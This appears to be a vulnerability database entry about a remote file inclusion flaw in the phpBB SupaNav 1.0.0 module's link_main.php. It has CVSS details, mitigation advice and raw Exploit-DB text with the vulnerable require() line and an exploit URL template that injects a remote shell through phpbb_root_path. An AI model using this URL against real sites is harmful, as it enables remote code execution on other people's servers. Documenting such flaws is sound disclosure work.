phpBB Module SupaNav 1.0.0 (link_main.php) Remote File Inclusion Vulnerability

vendor:

phpBB Module SupaNav

by:

bd0rk

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: phpBB Module SupaNav

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

phpBB Module SupaNav 1.0.0 (link_main.php) Remote File Inclusion Vulnerability

The vulnerability exists in the phpBB Module SupaNav 1.0.0 in the link_main.php file. The issue is caused by the lack of proper input validation in the phpbb_root_path parameter, allowing an attacker to include arbitrary files from a remote server. By exploiting this vulnerability, an attacker can execute malicious code or gain unauthorized access to the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the phpBB Module SupaNav and ensure that proper input validation is implemented for the phpbb_root_path parameter. Additionally, it is advised to restrict access to the link_main.php file and regularly update and patch the application.

Source

Exploit-DB raw data:

        phpBB Module SupaNav 1.0.0 (link_main.php) Remote File Inclusion Vulnerability


Vendor: http://www.phpbbhacks.com/download/8003

Download: http://www.phpbbhacks.com/load.php?id=8003

Founder: bd0rk

Website 1: www.soh-crew.it.tt

Website 2: www.school-of-hack.net

Contact: bd0rk[at]hackermail.com

ICQ: 249-613-511

Greetings: str0ke, TheJT, rgod, Kacper, GolD_M

Vulnerable Code in link_main.php:

--------------------------------------------------------------------------------------

require($phpbb_root_path.'language/lang_'.$userdata['user_lang'].'/lang_nav.'.$phpEx);

--------------------------------------------------------------------------------------

$phpbb_root_path is not declared before require

[+]Exploit: http://[target]/[directory]/link_main.php?phpbb_root_path=[ShellCode]


####The 18 years old german Hacker bd0rk####

# milw0rm.com [2007-07-18]